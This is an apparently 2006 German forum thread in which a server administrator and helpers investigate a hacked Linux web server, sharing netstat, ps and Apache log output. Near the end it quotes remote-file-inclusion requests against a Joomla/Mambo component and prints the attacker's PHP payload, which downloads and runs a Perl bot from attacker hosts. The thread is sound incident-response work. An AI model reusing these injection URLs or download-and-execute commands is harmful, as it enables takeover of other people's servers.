das Problem ist jetzt nur, wie bekomme ich jetzt am geschicktesten raus, worüber der rein ist ?

Vorher brauch ich ja nicht wirklich den Server "neu" machen ... macht ja keinen Sinn ;-)

Da der am IRC hängt, nutzt das denn was dem den Port zu sperren ?

Und, zwischendurch hat der ja immer wieder zB. htaccess1 usw gespeichert ... also muss der ja da schon was auf die Maschine gepackt haben ?!

Wann wurde der Kernel zuletzt aktualisiert? Welcher läuft (uname -a)?

2.6.11.4-21.13-default #1 Mon Jul 17 09_21:59 UTC 2006 i686 athlon i386 GNU/Linux

grüße

 

[charli]

Hallo,

das Problem ist jetzt nur, wie bekomme ich jetzt am geschicktesten raus, worüber der rein ist?

Logfiles lesen. Du hast nur das Error-Log zitiert, interessant ist auch das Access-Log zu den gleichen Zeiten. Die Aufrufe von Mambo (oder was auch immer der Einstieg ist) sind ja erfolgreich, also nur im Access-Log.
Eventuell reicht es bereits, wenn Du das Access-Log nach v6.txt suchst.

Da der am IRC hängt, nutzt das denn was dem den Port zu sperren ?

Forschen kannst Du auch im Rescue.
Ansonsten würde ich zumindest 6667 sperren und den Apachen stoppen.

Der Kernel ist scheinbar der Default von Suse, Version vom 17.7., der ist ok, das schwere Loch vom 15.7. ist gestopft und danach wurde keine schere Sicherheitslücke mehr berichtet. Reduziert das Risiko, daß der Einbrecher Root-Rechte erlangt hat. Lasse trotzdem chkrootkit laufen.

 

[docHouse]

Hallo ...

Also chrootkit habe ich laufen lassen, allerdings den internen von Plesk ... werden sich wohl alle nicht viel tun ...

Und das mit den LOGs, da werde ich mich gleich nochmal ranmachen, inzwischen habe ich nochmal nen netstat gemacht - sieht das okay aus, oder muss ich mir gedanken über die südamerikansche und karibische IP machen ?

Müsste doch auch relativ einfach sein, die IPs via Iptables zu sperren bzw. alle aus der entsprechenden region ?

Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 127.0.0.1:2912 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:993 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:995 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:106 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:110 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:143 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:8880 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:465 0.0.0.0:* LISTEN
tcp 0 0 85.214.35.238:53 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:53 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:3000 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:953 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:25 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:8443 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:2911 0.0.0.0:* LISTEN
tcp 0 0 85.214.35.238:143 83.77.200.109:59752 ESTABLISHED
tcp 0 0 85.214.35.238:110 217.188.112.19:1356 TIME_WAIT
tcp 0 0 85.214.35.238:56632 85.214.35.238:80 TIME_WAIT
tcp 0 0 85.214.35.238:33899 85.214.35.238:110 TIME_WAIT
tcp 0 0 85.214.35.238:33900 85.214.35.238:110 TIME_WAIT
tcp 0 0 85.214.35.238:33901 85.214.35.238:110 TIME_WAIT
tcp 0 0 85.214.35.238:143 87.122.224.156:1026 ESTABLISHED
tcp 0 0 85.214.35.238:993 87.122.224.156:4753 ESTABLISHED
tcp 0 0 85.214.35.238:143 87.122.224.156:4748 ESTABLISHED
tcp 0 0 85.214.35.238:143 87.122.224.156:5000 ESTABLISHED
tcp 0 0 85.214.35.238:143 87.122.224.156:4747 ESTABLISHED
tcp 0 0 85.214.35.238:143 87.122.224.156:4740 ESTABLISHED
tcp 0 0 85.214.35.238:143 87.122.224.156:4999 ESTABLISHED
tcp 0 0 85.214.35.238:143 87.122.224.156:4998 ESTABLISHED
tcp 0 0 :::80 :::* LISTEN
tcp 0 0 :::22 :::* LISTEN
tcp 0 0 :::443 :::* LISTEN
tcp 0 0 85.214.35.238:22 87.122.243.157:1554 ESTABLISHED
tcp 0 0 85.214.35.238:80 206.82.130.210:51766 TIME_WAIT
tcp 0 2776 85.214.35.238:22 87.122.224.156:4655 ESTABLISHED
tcp 0 0 85.214.35.238:80 129.35.231.1:60596 TIME_WAIT
tcp 0 0 85.214.35.238:80 83.135.129.37:1118 FIN_WAIT2
tcp 0 0 85.214.35.238:80 83.135.129.37:1116 FIN_WAIT2
tcp 0 0 85.214.35.238:80 83.135.129.37:1115 FIN_WAIT2
tcp 0 0 85.214.35.238:80 83.135.129.37:1114 FIN_WAIT2
tcp 0 0 85.214.35.238:80 83.135.129.37:1112 FIN_WAIT2
tcp 0 0 85.214.35.238:80 129.35.231.1:60635 TIME_WAIT
udp 0 0 0.0.0.0:32768 0.0.0.0:*
udp 0 0 85.214.35.238:53 0.0.0.0:*
udp 0 0 127.0.0.1:53 0.0.0.0:*
udp 112972 0 0.0.0.0:68 0.0.0.0:*
udp 0 0 85.214.35.238:123 0.0.0.0:*
udp 0 0 127.0.0.1:123 0.0.0.0:*
udp 0 0 0.0.0.0:123 0.0.0.0:*
udp 0 0 :::32769 :::*
udp 0 0 :::123 :::*
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags Type State I-Node Path
unix 2 [ ACC ] STREAM LISTENING 16200 /var/lib/mysql/mysql.sock
unix 2 [ ACC ] STREAM LISTENING 16407 /tmp/spamd_light.sock
unix 2 [ ACC ] STREAM LISTENING 15831 /var/run/nscd/socket
unix 2 [ ] DGRAM 114808 /var/lib/named/dev/log
unix 2 [ ] DGRAM 114810 /var/lib/ntp/dev/log
unix 11 [ ] DGRAM 114806 /dev/log
unix 2 [ ] DGRAM 5513 @udevd
unix 2 [ ACC ] STREAM LISTENING 16398 /tmp/spamd_full.sock
unix 2 [ ] DGRAM 120679
unix 2 [ ] DGRAM 120675
unix 2 [ ] DGRAM 118193
unix 2 [ ] DGRAM 115407
unix 2 [ ] DGRAM 115380
unix 3 [ ] STREAM CONNECTED 115373
unix 3 [ ] STREAM CONNECTED 115372
unix 2 [ ] DGRAM 115311
unix 2 [ ] DGRAM 114934
unix 2 [ ] DGRAM 114882
unix 2 [ ] DGRAM 114868
unix 3 [ ] STREAM CONNECTED 110908
unix 3 [ ] STREAM CONNECTED 110907
unix 3 [ ] STREAM CONNECTED 20596 /var/lib/mysql/mysql.sock
unix 3 [ ] STREAM CONNECTED 20595
unix 2 [ ] DGRAM 20587
unix 2 [ ] DGRAM 16933
unix 3 [ ] STREAM CONNECTED 16664
unix 3 [ ] STREAM CONNECTED 16663
unix 3 [ ] STREAM CONNECTED 16432
unix 3 [ ] STREAM CONNECTED 16431
unix 3 [ ] STREAM CONNECTED 16430
unix 3 [ ] STREAM CONNECTED 16429
unix 3 [ ] STREAM CONNECTED 16419
unix 3 [ ] STREAM CONNECTED 16418
unix 3 [ ] STREAM CONNECTED 16417
unix 3 [ ] STREAM CONNECTED 16416
unix 2 [ ] DGRAM 16404
unix 2 [ ] DGRAM 16395
unix 2 [ ] DGRAM 15979
unix 2 [ ] DGRAM 15945
unix 2 [ ] DGRAM 15783
unix 2 [ ] DGRAM 15699
h746895:/ #

Und hier ist nochmal nen Log ausschnitt für den Zeitraum wo das angefangen hat !

217.20.116.60 - - [10/Sep/2006:15:24:15 +0200] "GET / HTTP/1.0" 200 1251 "-" "check_http/1.24.2.4 (nagios-plugins )"
85.214.35.238 - - [10/Sep/2006:15:24:35 +0200] "GET / HTTP/1.1" 200 1251 "-" "monit/4.6"
88.73.22.127 - - [10/Sep/2006:15:42:14 +0200] "GET / HTTP/1.1" 200 1251 "http://www.mal-sehn.com/index.php/links" "Mozilla/4.0 (compatible; MSIE 6.0; Windows
88.73.22.127 - - [10/Sep/2006:15:42:15 +0200] "GET /default.css HTTP/1.1" 200 534 "http://www.kevin-kraus.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows N
88.73.22.127 - - [10/Sep/2006:15:42:15 +0200] "GET /def_plesk_logo.gif HTTP/1.1" 200 927 "http://www.kevin-kraus.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Wi
88.73.22.127 - - [10/Sep/2006:15:42:15 +0200] "GET /top_bg.jpg HTTP/1.1" 200 545 "http://www.kevin-kraus.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
88.73.22.127 - - [10/Sep/2006:15:42:15 +0200] "GET /top_body_bg.jpg HTTP/1.1" 200 14909 "http://www.kevin-kraus.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Win
88.73.22.127 - - [10/Sep/2006:15:42:42 +0200] "GET / HTTP/1.1" 304 - "http://www.mal-sehn.com/index.php/links" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
88.73.22.127 - - [10/Sep/2006:15:42:42 +0200] "GET /default.css HTTP/1.1" 304 - "http://www.kevin-kraus.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
88.73.22.127 - - [10/Sep/2006:15:42:42 +0200] "GET /def_plesk_logo.gif HTTP/1.1" 304 - "http://www.kevin-kraus.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Wind
88.73.22.127 - - [10/Sep/2006:15:42:42 +0200] "GET /top_body_bg.jpg HTTP/1.1" 304 - "http://www.kevin-kraus.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows
88.73.22.127 - - [10/Sep/2006:15:42:42 +0200] "GET /top_bg.jpg HTTP/1.1" 304 - "http://www.kevin-kraus.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5
85.214.35.238 - - [10/Sep/2006:15:49:35 +0200] "GET / HTTP/1.1" 200 1251 "-" "monit/4.6"
80.86.82.101 - - [10/Sep/2006:15:54:14 +0200] "GET / HTTP/1.0" 200 1251 "-" "check_http/1.24.2.4 (nagios-plugins )"
85.214.35.238 - - [10/Sep/2006:16:14:36 +0200] "GET / HTTP/1.1" 200 1251 "-" "monit/4.6"
80.237.140.108 - - [10/Sep/2006:16:24:14 +0200] "GET / HTTP/1.0" 200 1251 "-" "check_http/1.24.2.4 (nagios-plugins )"
216.73.112.234 - - [10/Sep/2006:16:39:14 +0200] "GET //README HTTP/1.1" 404 1046 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.73.112.234 - - [10/Sep/2006:16:39:15 +0200] "GET /horde//README HTTP/1.1" 404 1046 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.73.112.234 - - [10/Sep/2006:16:39:15 +0200] "GET /horde2//README HTTP/1.1" 404 1046 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.73.112.234 - - [10/Sep/2006:16:39:15 +0200] "GET /horde3//README HTTP/1.1" 404 1046 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.73.112.234 - - [10/Sep/2006:16:39:16 +0200] "GET /horde-3.0.5//README HTTP/1.1" 404 1046 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.73.112.234 - - [10/Sep/2006:16:39:16 +0200] "GET /horde-3.0.6//README HTTP/1.1" 404 1046 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.73.112.234 - - [10/Sep/2006:16:39:16 +0200] "GET /horde-3.0.7//README HTTP/1.1" 404 1046 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.73.112.234 - - [10/Sep/2006:16:39:17 +0200] "GET /horde-3.0.8//README HTTP/1.1" 404 1046 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.73.112.234 - - [10/Sep/2006:16:39:17 +0200] "GET /horde-3.0.9//README HTTP/1.1" 404 1046 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.73.112.234 - - [10/Sep/2006:16:39:18 +0200] "GET /mail//README HTTP/1.1" 404 1046 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.73.112.234 - - [10/Sep/2006:16:39:18 +0200] "GET /email//README HTTP/1.1" 404 1046 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.73.112.234 - - [10/Sep/2006:16:39:18 +0200] "GET /webmail//README HTTP/1.1" 404 1046 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.73.112.234 - - [10/Sep/2006:16:39:19 +0200] "GET /newmail//README HTTP/1.1" 404 1046 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.73.112.234 - - [10/Sep/2006:16:39:19 +0200] "GET /mails//README HTTP/1.1" 404 1046 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.73.112.234 - - [10/Sep/2006:16:39:19 +0200] "GET /mailz//README HTTP/1.1" 404 1046 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
85.214.35.238 - - [10/Sep/2006:16:39:36 +0200] "GET / HTTP/1.1" 200 1251 "-" "monit/4.6"
85.70.97.197 - - [10/Sep/2006:16:49:19 +0200] "GET / HTTP/1.1" 200 239 "http://search1.seznam.cz/searchGoogleScreen?&from=11&step=10&mod=g"
213.133.109.71 - - [10/Sep/2006:16:54:14 +0200] "GET / HTTP/1.0" 200 1251 "-" "check_http/1.24.2.4 (nagios-plugins )"

grüße

 

[charli]

Hallo,

ps aux

 

[docHouse]

Okay , nachfolgend ;-)

USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 680 248 ? S 10:16 0:00 init [3]
root 2 0.0 0.0 0 0 ? SN 10:16 0:00 [ksoftirqd/0]
root 3 0.0 0.0 0 0 ? S< 10:16 0:00 [events/0]
root 4 0.0 0.0 0 0 ? S< 10:16 0:00 [khelper]
root 9 0.0 0.0 0 0 ? S< 10:16 0:00 [kthread]
root 19 0.0 0.0 0 0 ? S< 10:16 0:00 [kacpid]
root 114 0.0 0.0 0 0 ? S< 10:16 0:00 [kblockd/0]
root 154 0.0 0.0 0 0 ? S 10:16 0:00 [pdflush]
root 155 0.0 0.0 0 0 ? S 10:16 0:01 [pdflush]
root 157 0.0 0.0 0 0 ? S< 10:16 0:00 [aio/0]
root 156 0.0 0.0 0 0 ? S 10:16 0:00 [kswapd0]
root 749 0.0 0.0 0 0 ? S 10:17 0:00 [kseriod]
root 956 0.0 0.0 0 0 ? S< 10:17 0:00 [ata/0]
root 962 0.0 0.0 0 0 ? S 10:17 0:00 [scsi_eh_0]
root 963 0.0 0.0 0 0 ? S 10:17 0:00 [scsi_eh_1]
root 964 0.0 0.0 0 0 ? S 10:17 0:00 [scsi_eh_2]
root 965 0.0 0.0 0 0 ? S 10:17 0:00 [scsi_eh_3]
root 1204 0.0 0.0 0 0 ? S 10:17 0:01 [kjournald]
root 2152 0.0 0.0 1472 600 ? S<s 10:17 0:00 /sbin/udevd -d
root 2204 0.0 0.0 1460 444 ? S< 10:17 0:00 [hwscand]
root 2619 0.0 0.0 0 0 ? S 10:17 0:00 [khubd]
root 3543 0.0 0.0 1460 436 ? S< 10:17 0:00 [hwscand]
root 5231 0.0 0.0 1492 492 ? S<s 10:17 0:00 /sbin/dhcpcd -C -H -D -N -t 999999 -h elmo eth0
root 5468 0.0 0.0 1852 928 ? Ss 10:17 0:00 /sbin/syslog-ng
root 5471 0.0 0.0 1604 592 ? Ss 10:17 0:00 /sbin/klogd -c 1 -x -x
root 5497 0.0 0.0 2736 840 ? S 10:17 0:00 /usr/lib/courier-imap/couriertcpd -address=0 -stderrlogger=/usr/sbin/courierlogger -stderrlo
root 5499 0.0 0.0 2644 756 ? S 10:17 0:00 /usr/sbin/courierlogger imapd
root 5508 0.0 0.0 2736 840 ? S 10:17 0:00 /usr/lib/courier-imap/couriertcpd -address=0 -stderrlogger=/usr/sbin/courierlogger -stderrlo
root 5510 0.0 0.0 2644 756 ? S 10:17 0:00 /usr/sbin/courierlogger imapd-ssl
root 5517 0.0 0.0 2736 840 ? S 10:17 0:00 /usr/lib/courier-imap/couriertcpd -address=0 -stderrlogger=/usr/sbin/courierlogger -stderrlo
root 5519 0.0 0.0 2644 756 ? S 10:17 0:00 /usr/sbin/courierlogger pop3d
root 5527 0.0 0.0 2736 840 ? S 10:17 0:00 /usr/lib/courier-imap/couriertcpd -address=0 -stderrlogger=/usr/sbin/courierlogger -stderrlo
root 5529 0.0 0.0 2644 756 ? S 10:17 0:00 /usr/sbin/courierlogger pop3d-ssl
root 5617 0.0 0.1 4600 1972 ? Ss 10:17 0:00 /usr/sbin/sshd -o PidFile=/var/run/sshd.init.pid
root 5624 0.0 0.0 2152 924 ? Ss 10:17 0:00 /usr/sbin/xinetd
ntp 5657 0.0 0.2 2812 2812 ? SLs 10:17 0:00 /usr/sbin/ntpd -p /var/lib/ntp/var/run/ntp/ntpd.pid -u ntp -i /var/lib/ntp
root 5674 0.0 0.1 8732 1112 ? Ssl 10:17 0:00 /usr/sbin/nscd
named 5748 0.0 0.3 30864 3312 ? Ssl 10:17 0:00 /usr/sbin/named -t /var/lib/named -u named
root 5772 0.0 0.1 2444 1144 ? S 10:17 0:00 /bin/sh /usr/bin/mysqld_safe --user=mysql --pid-file=/var/lib/mysql/mysqld.pid --socket=/var
mysql 5850 0.2 2.6 104116 27072 ? Sl 10:17 0:45 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/my
qmails 5867 0.0 0.0 1516 472 ? S 10:17 0:00 qmail-send
qmaill 5869 0.0 0.0 1472 424 ? S 10:17 0:00 splogger qmail
root 5870 0.0 0.0 1500 360 ? S 10:17 0:00 qmail-lspawn ./Maildir/
qmailr 5871 0.0 0.0 1496 392 ? S 10:17 0:00 qmail-rspawn
qmailq 5872 0.0 0.0 1464 320 ? S 10:17 0:00 qmail-clean
root 5902 0.0 0.2 9640 2680 ? Ss 10:17 0:00 sshd: iiyama [priv]
root 5913 0.0 2.4 27852 25204 ? Ss 10:17 0:00 /usr/sbin/spamd --username=popuser --daemonize --helper-home-dir=/var/qmail --max-children 5
root 5915 0.0 2.1 25276 22644 ? Ss 10:17 0:00 /usr/sbin/spamd --username=popuser --daemonize --helper-home-dir=/var/qmail --max-children 5
popuser 5917 0.0 2.1 25408 22764 ? S 10:17 0:00 spamd child
popuser 5918 0.0 2.1 25276 22648 ? S 10:17 0:00 spamd child
popuser 5919 0.1 3.0 34468 32024 ? S 10:17 0:25 spamd child
popuser 5920 0.0 2.6 30280 27828 ? S 10:17 0:02 spamd child
iiyama 5953 0.0 0.2 9776 2788 ? S 10:17 0:02 sshd: iiyama@pts/1
iiyama 5954 0.0 0.1 4208 1816 pts/1 Ss 10:17 0:00 -bash
root 5975 0.0 1.4 29640 14672 ? Ss 10:17 0:00 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
root 6014 0.0 0.1 6576 2004 pts/1 S 10:17 0:00 su -
root 6055 0.0 0.0 1752 636 ? Ss 10:17 0:00 /usr/sbin/cron
root 6063 0.0 0.0 1908 632 tty1 Ss+ 10:17 0:00 /sbin/mingetty --noclear tty1
root 6064 0.0 0.0 1472 472 ttyS0 Ss+ 10:17 0:00 /sbin/agetty -L 57600 ttyS0
root 6066 0.0 0.2 12180 2120 ? Ssl 10:17 0:00 /usr/local/psa/admin/bin/modules/watchdog/monit -Ic /usr/local/psa/etc/modules/watchdog/moni
root 6065 0.0 0.5 16024 5660 ? Ss 10:17 0:00 /usr/local/psa/admin/bin/php /usr/local/psa/admin/bin/modules/watchdog/wdcollect -c /usr/loc
root 6073 0.0 0.1 3180 1772 pts/1 S 10:17 0:00 -bash
drweb 6093 0.0 1.1 14932 12404 ? Ss 10:17 0:03 /opt/drweb/drwebd -ini=/etc/drweb/drweb32.ini
popuser 7513 0.0 0.1 3984 1064 ? S 10:30 0:00 /usr/bin/imapd Maildir
drweb 9020 0.0 1.1 14932 12404 ? S 10:52 0:00 /opt/drweb/drwebd -ini=/etc/drweb/drweb32.ini
drweb 9021 0.0 1.1 14932 12404 ? S 10:52 0:00 /opt/drweb/drwebd -ini=/etc/drweb/drweb32.ini
drweb 9022 0.0 1.1 14932 12404 ? S 10:52 0:00 /opt/drweb/drwebd -ini=/etc/drweb/drweb32.ini
drweb 9023 0.0 1.1 14932 12404 ? S 10:52 0:00 /opt/drweb/drwebd -ini=/etc/drweb/drweb32.ini
drweb 9024 0.0 1.1 14932 12404 ? S 10:52 0:00 /opt/drweb/drwebd -ini=/etc/drweb/drweb32.ini
drweb 9025 0.0 1.1 14932 12404 ? S 10:52 0:00 /opt/drweb/drwebd -ini=/etc/drweb/drweb32.ini
drweb 9026 0.0 1.1 14932 12404 ? S 10:52 0:00 /opt/drweb/drwebd -ini=/etc/drweb/drweb32.ini
drweb 9027 0.0 1.1 14932 12404 ? S 10:52 0:00 /opt/drweb/drwebd -ini=/etc/drweb/drweb32.ini
drweb 9028 0.0 1.1 14932 12404 ? S 10:52 0:00 /opt/drweb/drwebd -ini=/etc/drweb/drweb32.ini
drweb 9029 0.0 1.1 14932 12404 ? S 10:52 0:00 /opt/drweb/drwebd -ini=/etc/drweb/drweb32.ini
drweb 9030 0.0 1.1 14932 12404 ? S 10:52 0:00 /opt/drweb/drwebd -ini=/etc/drweb/drweb32.ini
drweb 9031 0.0 1.1 14932 12404 ? S 10:52 0:00 /opt/drweb/drwebd -ini=/etc/drweb/drweb32.ini
drweb 9032 0.0 1.1 14932 12404 ? S 10:52 0:00 /opt/drweb/drwebd -ini=/etc/drweb/drweb32.ini
drweb 9033 0.0 1.1 14932 12404 ? S 10:52 0:00 /opt/drweb/drwebd -ini=/etc/drweb/drweb32.ini
drweb 9034 0.0 1.1 14932 12408 ? S 10:52 0:00 /opt/drweb/drwebd -ini=/etc/drweb/drweb32.ini
drweb 9035 0.0 1.1 14932 12408 ? S 10:52 0:00 /opt/drweb/drwebd -ini=/etc/drweb/drweb32.ini
root 5991 0.0 0.4 47856 5040 ? Ss 10:17 0:00 /usr/local/psa/admin/bin/httpsd
psaadm 19732 0.0 2.7 54816 28664 ? S 14:30 0:01 /usr/local/psa/admin/bin/httpsd
psaadm 19733 0.0 2.2 52756 23492 ? S 14:30 0:00 /usr/local/psa/admin/bin/httpsd
psaadm 19734 0.0 1.8 52756 19500 ? S 14:30 0:00 /usr/local/psa/admin/bin/httpsd
psaadm 19735 0.0 2.3 53752 24332 ? S 14:30 0:01 /usr/local/psa/admin/bin/httpsd
psaadm 19736 0.0 1.8 52512 19496 ? S 14:30 0:00 /usr/local/psa/admin/bin/httpsd
psaadm 19803 0.0 1.7 52604 18592 ? S 14:30 0:00 /usr/local/psa/admin/bin/httpsd
root 20170 0.0 0.2 8472 2108 pts/1 S+ 14:36 0:00 /usr/bin/mc -P /tmp/mc-root/mc.pwd.6073
root 20172 0.0 0.1 3184 1776 pts/0 Ss+ 14:36 0:00 bash -rcfile .bashrc
root 20279 0.0 0.2 9640 2676 ? Ss 14:39 0:00 sshd: iiyama [priv]
iiyama 20286 0.0 0.2 9776 2780 ? S 14:39 0:00 sshd: iiyama@pts/2
iiyama 20287 0.0 0.1 4208 1812 pts/2 Ss 14:39 0:00 -bash
root 20307 0.0 0.1 6576 1996 pts/2 S 14:39 0:00 su -
root 20310 0.0 0.1 3176 1768 pts/2 S 14:39 0:00 -bash
popuser 20628 0.0 0.0 3984 1036 ? S 14:44 0:00 /usr/bin/imapd Maildir
popuser 20637 0.0 0.1 3984 1052 ? S 14:44 0:00 /usr/bin/imapd Maildir
popuser 20638 0.0 0.1 3984 1044 ? S 14:44 0:00 /usr/bin/imapd Maildir
root 20647 0.0 0.1 2816 1360 ? S 14:44 0:00 /usr/bin/couriertls -server -tcpd /usr/sbin/imaplogin /usr/lib/courier-imap/authlib/authpsa
psaadm 21188 0.0 2.2 52796 23288 ? S 14:59 0:00 /usr/local/psa/admin/bin/httpsd
popuser 21611 0.0 0.0 3984 1036 ? S 15:03 0:00 /usr/bin/imapd Maildir
popuser 21615 0.0 0.1 3984 1072 ? S 15:03 0:00 /usr/bin/imapd Maildir
popuser 21635 0.0 0.1 3984 1080 ? S 15:04 0:00 /usr/bin/imapd Maildir
popuser 21636 0.0 0.1 3984 1088 ? S 15:04 0:00 /usr/bin/imapd Maildir
popuser 21637 0.0 0.1 3984 1048 ? S 15:04 0:00 /usr/bin/imapd Maildir
psaadm 22077 0.0 1.8 52952 19256 ? S 15:08 0:00 /usr/local/psa/admin/bin/httpsd
wwwrun 22691 0.1 2.0 35484 21244 ? S 15:20 0:02 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun 22692 0.1 2.0 35124 20880 ? S 15:20 0:01 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun 22722 0.2 2.0 34984 20860 ? S 15:22 0:02 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun 23168 0.0 1.9 34904 20540 ? S 15:32 0:00 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun 23323 0.1 1.9 34896 20476 ? S 15:35 0:00 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun 23324 0.0 1.9 34836 20696 ? S 15:35 0:00 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun 23454 0.2 1.9 34848 20596 ? S 15:38 0:00 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun 23457 0.1 1.9 34352 19880 ? S 15:39 0:00 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun 23489 0.7 1.9 34728 20252 ? S 15:39 0:01 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun 23492 0.6 1.9 34632 20528 ? S 15:39 0:01 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun 23702 0.0 1.4 29640 14684 ? S 15:42 0:00 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun 23703 0.0 1.4 29640 14684 ? S 15:42 0:00 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun 23704 0.0 1.4 29640 14684 ? S 15:42 0:00 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
root 23705 0.0 0.0 2724 824 pts/2 R+ 15:42 0:00 ps -aux

 

[charli]

Hallo,

im Moment läuft jedenfalls kein Perl, und der Apache ist nicht übertrieben aktiv.

Im letzten Logauszug steht nicht das drin was ich suche. Schreibt Dein System für die Domains separate Logfiles (z.B. Confixx in /path/to/webX/logs), dann auch die durchsuchen.

 

[V40]

Hallo,

auf jeden Fall sofort in Rescue-Modus gehen, dann können immer noch weiter Analyse-Schritte getätigt werden.

Für mich sieht das zur Zeit danach aus das Joomla das "Problemkind" ist.
Das ist aber nur eine Spekulation.

 

[docHouse]

Hallo ...

ich glaube ich habe es endlich gefunden ....

210.173.180.168 - - [13/Sep/2006:02:24:40 +0200] "GET /%20%09images/M_images/images/images/stories/images/images/images/stories/pozente.png HTTP/1.1" 200 25935 "-" "ichiro/2.0 (http://help.goo.ne.jp/door/crawler.html)"

Was der crawler auch immer suchen mag ?

Und das hier kommt dabei sehr oft vor:

80.81.165.201 - - [13/Sep/2006:00:01:29 +0200] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://albanet.1500mb.com/e.txt? HTTP/1.1" 200 1056 "-" "libwww-perl/5.805"

Beim Aufruf kommt dann das dabei raus

<?
passthru('cd /tmp;wget 404 Error px;rm -f px*');
passthru('cd /tmp;curl -O 404 Error px;rm -f px*');
passthru('cd /tmp;lwp-download 404 Error px.tpxt;rm -f px*');
passthru('cd /tmp;lynpx -source http://albanet.1500mb.com/px >px;perl px;rm -f px*');
passthru('cd /tmp;fetch http://albanet.1500mb.com/px >px;perl px;rm -f px*');
passthru('cd /tmp;GET http://albanet.1500mb.com/px >px;perl px;rm -f px*');
?>
Owned by Morgan

63.247.85.242 - - [12/Sep/2006:15:35:18 +0200] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://tckct.co.uk/v6.txt? HTTP/1.1" 200 1056 "-" "libwww-perl/5.805"
203.63.5.173 - - [12/Sep/2006:15:36:07 +0200] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://tckct.co.uk/v6.txt? HTTP/1.1" 200 1056 "-" "libwww-perl/5.79"
70.85.92.122 - - [12/Sep/2006:15:36:14 +0200] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://tckct.co.uk/v6.txt? HTTP/1.1" 200 1056 "-" "libwww-perl/5.805"
63.247.85.242 - - [12/Sep/2006:15:36:46 +0200] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://tckct.co.uk/v6.txt? HTTP/1.1" 200 1056 "-" "libwww-perl/5.805"
70.85.92.122 - - [12/Sep/2006:15:39:42 +0200] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://tckct.co.uk/v6.txt? HTTP/1.1" 200 1056 "-" "libwww-perl/5.805"
89.108.64.188 - - [12/Sep/2006:15:39:49 +0200] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://source.webcindario.com/ale.txt? HTTP/1.1" 200 1056 "-" "libwww-perl/5.803"
87.117.208.50 - - [12/Sep/2006:15:40:23 +0200] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://tckct.co.uk/v6.txt? HTTP/1.1" 200 1056 "-" "libwww-perl/5.805"

Beim Aufruf von Webcindario ....

<?
passthru('cd /tmp;wget La página solicitada no se encuentra - miarroba.com nasti.txt;rm -f nasti.txt*');
